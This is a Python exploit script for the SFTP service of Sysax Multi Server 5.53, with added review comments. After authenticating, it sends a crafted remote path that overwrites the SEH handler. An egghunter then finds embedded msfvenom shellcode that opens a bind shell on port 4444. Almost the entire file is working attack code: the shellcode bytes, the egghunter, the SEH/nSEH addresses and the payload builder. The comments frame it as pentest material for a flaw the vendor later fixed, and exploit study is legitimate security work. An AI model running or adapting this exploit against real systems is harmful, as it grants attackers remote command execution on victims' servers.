#!/usr/bin/python
|
|
##########################################################################################################
|
|
#Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
|
|
#Author: Craig Freyman (@cd1zz)
|
|
#Tested on: XP SP3 32bit
|
|
#Software Versions Tested: 5.53
|
|
#Date Discovered: February 22, 2012
|
|
#Vendor Contacted: February 23, 2012
|
|
#Vendor Response: February 27, 2012
|
|
#Vendor Fix: Version 5.55
|
|
#Notes: Offset based on home path length. This exploit works for C:\AAAAAAAAAAAAAAAA
|
|
#Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
|
|
##########################################################################################################
|
|
import paramiko,os,sys
|
|
|
|
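USAGE = "[+] Usage: ./filename <Target IP> <Port> <User> <Password>"

# Distance from the start of the remote path to the nSEH slot. Per the header
# notes this is 256 only when the SFTP user's home directory is
# C:\AAAAAAAAAAAAAAAA; a different home length shifts the overwrite and the
# request will most likely just crash the service without running the payload.
JUNK_LEN = 256

# Local destination handed to sftp.get(). The transfer is not expected to
# complete (the malicious path is what triggers the overflow); the path only
# has to be creatable on the attacking host.
LOCALPATH = "/tmp/system.log"

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
# Prefixed with the doubled egg "DNWPDNWP" that the egghunter searches for.
# NOTE(review): this is a *bind* shell -- after the crash, connect to
# <Target IP>:4444 yourself. The listener accepts anyone, so record it and
# make sure it is torn down when the engagement is over.
SHELL = (b"DNWPDNWP"
         b"\xdb\xd9\xba\xf9\x77\x28\x1b\xd9\x74\x24\xf4\x5e\x29\xc9"
         b"\xb1\x56\x31\x56\x18\x83\xee\xfc\x03\x56\xed\x95\xdd\xe7"
         b"\xe5\xd3\x1e\x18\xf5\x83\x97\xfd\xc4\x91\xcc\x76\x74\x26"
         b"\x86\xdb\x74\xcd\xca\xcf\x0f\xa3\xc2\xe0\xb8\x0e\x35\xce"
         b"\x39\xbf\xf9\x9c\xf9\xa1\x85\xde\x2d\x02\xb7\x10\x20\x43"
         b"\xf0\x4d\xca\x11\xa9\x1a\x78\x86\xde\x5f\x40\xa7\x30\xd4"
         b"\xf8\xdf\x35\x2b\x8c\x55\x37\x7c\x3c\xe1\x7f\x64\x37\xad"
         b"\x5f\x95\x94\xad\x9c\xdc\x91\x06\x56\xdf\x73\x57\x97\xd1"
         b"\xbb\x34\xa6\xdd\x36\x44\xee\xda\xa8\x33\x04\x19\x55\x44"
         b"\xdf\x63\x81\xc1\xc2\xc4\x42\x71\x27\xf4\x87\xe4\xac\xfa"
         b"\x6c\x62\xea\x1e\x73\xa7\x80\x1b\xf8\x46\x47\xaa\xba\x6c"
         b"\x43\xf6\x19\x0c\xd2\x52\xcc\x31\x04\x3a\xb1\x97\x4e\xa9"
         b"\xa6\xae\x0c\xa6\x0b\x9d\xae\x36\x03\x96\xdd\x04\x8c\x0c"
         b"\x4a\x25\x45\x8b\x8d\x4a\x7c\x6b\x01\xb5\x7e\x8c\x0b\x72"
         b"\x2a\xdc\x23\x53\x52\xb7\xb3\x5c\x87\x18\xe4\xf2\x77\xd9"
         b"\x54\xb3\x27\xb1\xbe\x3c\x18\xa1\xc0\x96\x2f\xe5\x0e\xc2"
         b"\x7c\x82\x72\xf4\x93\x0e\xfa\x12\xf9\xbe\xaa\x8d\x95\x7c"
         b"\x89\x05\x02\x7e\xfb\x39\x9b\xe8\xb3\x57\x1b\x16\x44\x72"
         b"\x08\xbb\xec\x15\xda\xd7\x28\x07\xdd\xfd\x18\x4e\xe6\x96"
         b"\xd3\x3e\xa5\x07\xe3\x6a\x5d\xab\x76\xf1\x9d\xa2\x6a\xae"
         b"\xca\xe3\x5d\xa7\x9e\x19\xc7\x11\xbc\xe3\x91\x5a\x04\x38"
         b"\x62\x64\x85\xcd\xde\x42\x95\x0b\xde\xce\xc1\xc3\x89\x98"
         b"\xbf\xa5\x63\x6b\x69\x7c\xdf\x25\xfd\xf9\x13\xf6\x7b\x06"
         b"\x7e\x80\x63\xb7\xd7\xd5\x9c\x78\xb0\xd1\xe5\x64\x20\x1d"
         b"\x3c\x2d\x50\x54\x1c\x04\xf9\x31\xf5\x14\x64\xc2\x20\x5a"
         b"\x91\x41\xc0\x23\x66\x59\xa1\x26\x22\xdd\x5a\x5b\x3b\x88"
         b"\x5c\xc8\x3c\x99")

# 32-byte egghunter: walks memory a page at a time, probes each address with
# the int 0x2e syscall (push 2 / pop eax / int 0x2e) so unmapped pages do not
# fault, and on finding two consecutive copies of the tag loaded by
# `mov eax, 0x50574e44` ("DNWP" little-endian) jumps to the bytes after them.
# The tag must match the prefix of SHELL above.
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
             b"\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x4e\x57\x50"
             b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# nSEH: two NOPs, then `jmp short +8` -- skips the 4-byte SEH slot and lands
# 4 bytes into the NOP sled that precedes the egghunter.
NSEH = b"\x90\x90\xeb\x08"

# SEH: 0x5D9247A1, pop/pop/ret in RPCNS4.dll (module not compiled with
# SafeSEH). Address is specific to the XP SP3 32-bit target in the header.
SEH = b"\xA1\x47\x92\x5D"


def build_payload(junk_len=JUNK_LEN):
    """Return the malicious remote path as bytes.

    Layout, in order: ``junk_len`` filler bytes | nSEH | SEH | 10 NOPs |
    egghunter | 1000 NOPs | egg-tagged shellcode | 100 NOPs.

    ``junk_len`` is the offset of the SEH overwrite and depends on the
    length of the target user's home path (256 for the path in the header).

    The payload is built as bytes so the shellcode is never re-encoded as
    UTF-8 under Python 3 (under Python 2 bytes and str are the same type and
    the wire bytes are unchanged). NOTE(review): this relies on paramiko
    passing a bytes path through untouched -- confirm with the installed
    version before relying on it under Python 3.
    """
    return (b"A" * junk_len
            + NSEH + SEH
            + b"\x90" * 10 + EGGHUNTER
            + b"\x90" * 1000 + SHELL
            + b"\x90" * 100)


def parse_args(argv):
    """Return ``(host, port, username, password)`` from an argv list.

    Prints the usage line and exits with status 1 on a wrong argument count
    or a non-numeric port.
    """
    if len(argv) != 5:
        print(USAGE)
        sys.exit(1)
    try:
        port = int(argv[2])
    except ValueError:
        print(USAGE)
        sys.exit(1)
    return argv[1], port, argv[3], argv[4]


def main(argv=None):
    """Authenticate to the SFTP service and request the malicious path.

    This is a post-auth exploit: valid SFTP credentials are required. The
    transport is always closed, and an exception from the transfer is
    reported rather than dumped as a traceback, because the server dropping
    the connection is the expected outcome once the payload fires.
    """
    host, port, username, password = parse_args(sys.argv if argv is None else argv)
    payload = build_payload()

    print("============================================================================")
    print(" Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter) ")
    print(" by cd1zz ")
    print(" www.pwnag3.com ")
    print(" Launching exploit against " + host + " on port " + str(port) + " for XP")
    print("============================================================================")

    transport = paramiko.Transport((host, port))
    try:
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        try:
            sftp.get(payload, LOCALPATH)
        except Exception as exc:
            # The overflow is triggered by the path itself, so the transfer
            # is not expected to complete. Surface the error and let the
            # operator check whether port 4444 is now listening.
            print("[*] Transfer aborted: %r -- check %s:4444 for the bind shell" % (exc, host))
        finally:
            sftp.close()
    finally:
        transport.close()


if __name__ == "__main__":
    main()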